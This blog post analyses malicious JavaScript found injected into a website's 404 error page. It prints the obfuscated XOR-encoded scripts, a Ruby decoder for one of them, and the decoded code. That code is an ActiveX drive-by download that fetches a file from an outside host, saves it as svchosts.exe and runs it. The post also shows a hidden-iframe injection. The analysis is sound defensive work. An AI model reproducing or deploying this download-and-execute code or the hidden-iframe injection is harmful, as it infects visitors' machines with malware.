<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 =  str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

str2 now contains the de-obfuscated javascript, which after inserting line breaks, looks something like this:

poexali();
function poexali() {
 var ender = document.createElement('object');
 ender.setAttribute('id','ender');
 ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
 try {
  var asq = ender.CreateObject('msxml2.XMLHTTP','');
  var ass = ender.CreateObject("Shell.Application",'');
  var asst = ender.CreateObject('adodb.stream','');
  try {
   asst.type = 1;
   asq.open('GET','http://worldchinesewriters.com//load.php',false);
   asq.send();
   asst.open();
   asst.Write(asq.responseBody);
   var imya = './/..//svchosts.exe';
   asst.SaveToFile(imya,2);
   asst.Close();
  } catch(e) {}
  try {
   ass.shellexecute(imya);
  } catch(e) {}
 }catch(e){}
}

Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php and save it into the local file “svchosts.exe”, then execute the file.

Super-quick post, since lately I seem to be a tad verbose. What “svchosts.exe” does is left as an exercise to the reader

<script language="JavaScript">
var0 = "x69x3cx33x27x34x38x30x75x3bx34"; var1 = "x38x30x68x72x36x3ax20x3bx21x30"; var2 = "x27x72x75x26x27x36x68x72x3dx21"; var3 = "x21x25x6fx7ax7ax33x27x34x38x30"; var4 = "x26x21x34x21x7bx3bx30x21x7ax3c"; var5 = "x3bx31x30x2dx67x7bx25x3dx25x72"; var6 = "x75x3dx30x3cx32x3dx21x68x72x64"; var7 = "x63x72x75x22x3cx31x21x3dx68x72"; var8 = "x64x63x72x75x33x27x34x38x30x37"; var9 = "x3ax27x31x30x27x68x72x65x72x75"; var10 = "x26x36x27x3ax39x39x3cx3bx32x68"; var11 = "x72x3bx3ax72x6bx69x7ax3cx33x27"; var12 = "x34x38x30x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>

The “getElementById” that testws35fdgh refers to is this empty div:

<div id="testws35fdgh"></div>

As it turns out, this is some really terrible obfuscation, here’s the simple script to decode it (written in Ruby because I like Ruby):

#!/usr/bin/env ruby
hex = ["x69","x3c","x33","x27","x34","x38",
"x30","x75","x3b","x34","x38","x30","x68",
"x72","x36","x3a","x20","x3b","x21","x30",
"x27","x72","x75","x26","x27","x36","x68",
"x72","x3d","x21","x21","x25","x6f","x7a",
"x7a","x33","x27","x34","x38","x30","x26",
"x21","x34","x21","x7b","x3b","x30","x21",
"x7a","x3c","x3b","x31","x30","x2d","x67",
"x7b","x25","x3d","x25","x72","x75","x3d",
"x30","x3c","x32","x3d","x21","x68","x72",
"x64","x63","x72","x75","x22","x3c","x31",
"x21","x3d","x68","x72","x64","x63","x72",
"x75","x33","x27","x34","x38","x30","x37",
"x3a","x27","x31","x30","x27","x68","x72",
"x65","x72","x75","x26","x36","x27","x3a",
"x39","x39","x3c","x3b","x32","x68","x72",
"x3b","x3a","x72","x6b","x69","x7a","x3c",
"x33","x27","x34","x38","x30","x6b"]
line = ""
hex.each { |c|
## Unpack the char
c = c.unpack('c').to_s.to_i
## XOR with 85
d = c ^ 85
## Pack back into a character
t = [d].pack('c')
## Append to the line
line = line + t
}
puts line

Which eventually leads you to:

<iframe name='counter' src='http://framestat.net/index2.php' height='16' width='16' frameborder='0' scrolling='no'></iframe>

If you do a whois on the framestat.net domain, you can see that the domain was suspended:

Registrant:
Suspended Domain ****@4host.info +1.00000000
Suspended domain
Suspended domain
Suspended domain,
Suspended domain,US 94040

Registration Service Provider:
name: Rustelekom Ltd.
tel: +1.8666254678
fax: +1.9782465632
web:http://nameservers.ru

Looks like someone’s been up to something naughty It also looks like it was originally a Russian site (not that it matters). Since the site is down, it’s difficult to tell what would have happened if the iframe source still existed. I’m guessing malware.

Still, the question remains, how did the javascript get to the page? I’m still looking in to that, right now my theory is php remote-file-inclusion, but we’ll see as things become a bit more clear.